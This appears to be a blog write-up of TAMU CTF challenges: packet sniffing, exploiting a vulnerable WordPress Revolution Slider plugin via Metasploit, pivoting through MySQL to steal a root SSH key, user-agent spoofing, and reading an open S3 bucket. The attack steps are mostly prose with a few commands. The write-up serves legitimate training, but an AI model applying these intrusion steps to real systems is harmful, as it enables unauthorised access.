Another great CTF that my team and I participated in last week, TAMU CTF had a wide range of challenges which made it a nice experience. It ran for a whole week. It is organized by Texas A&M University Students!
Now for the challenges I solved!
1. Stop and Listen
As the challenge says all we have to do is listen. So objective is to sniff for packets on the network and get the flag. I connected to the network via vpn with the instructions provided, then fired up wireshark to sniff packets on tap0 which was the network interface created by vpn. The flag is there in plain text.
I setup my own Wordpress site!
I love that there are so many plugins. My favorite is Revolution Slider. Even though it’s a little old it doesn’t show up on wpscan!
Please give it about 30 seconds after connecting for everything to setup correctly.
The flag is in
This was a really a cool one, because we have to exploit the wordpress site through the mentioned plugin and escalate through the db to get to root.
First is to run nmap on the network and get the IPs.
There are two hosts up in the network one running the database and the other ssh and webserver.
After visiting the website and clicking around there wasn’t much I could find on the site so I decided to find out check if the mentioned plugin is indeed vulnerable by running wpscan.
Now that wpscan has confirmed the vulnerability, let’s exploit it with the available metasploit module and get a shell.
After firing up metasploit and running the exploit to get a shell, I changed to www directory to check for configs. There’s a note.txt with a message that ssh key was placed on the DB server.
Getting DB credentials:
Now we can login to the DB server using this command.
mysql -u wordpress -h 172.30.0.2 -p
After logging in I use the following command to read the ssh private key.
I copied the key, saved it to a file and run this command to ssh. I knew root was the user to use because when I checked the /etc/passwd file there was no other user listed.
ssh -i ssh.key email@example.com
Finally the flag:
To be updated
1. Robots Rule
This was an easy one, immediately I saw the title I had a pretty good idea of what the challenge was. My guess is we have to change the user agent to a bot. So I visited the link and intercepted the request using burp and changed the user agent to Googlebot 2.1 but nothing changed. Then I thought let me visit the robots.txt file and got this.
I updated the agent again when visiting the robots.txt file to see if the message changes and got the flag.
This link below has some bot user agents, but for this case I used a google bot.
Crawler User Agents
We have over 2,171 user agents for Crawler which you can browse and explore. They are categorised by the browser…
Checkout my s3 bucket website!
Visiting the link provided, we get this web page.
Nothing interesting, so checking the source of the page there are some comments.
It’s clear that the challenge has something to do with aws s3 buckets. Maybe the bucket listed on the comments is our solution. However we get a 404 not found.
So then I googled how s3 buckets work and got to this page:
Working with Amazon S3 Buckets - Amazon Simple Storage Service
Store all of your files, known as objects, within a uniquely named Amazon S3 bucket.
After reading through the document, I learn that to access an aws bucket the link is in this format: http:// bucket.s3.amazonaws.com . So I update the link and get access. Scrolling through I come across the flag.txt .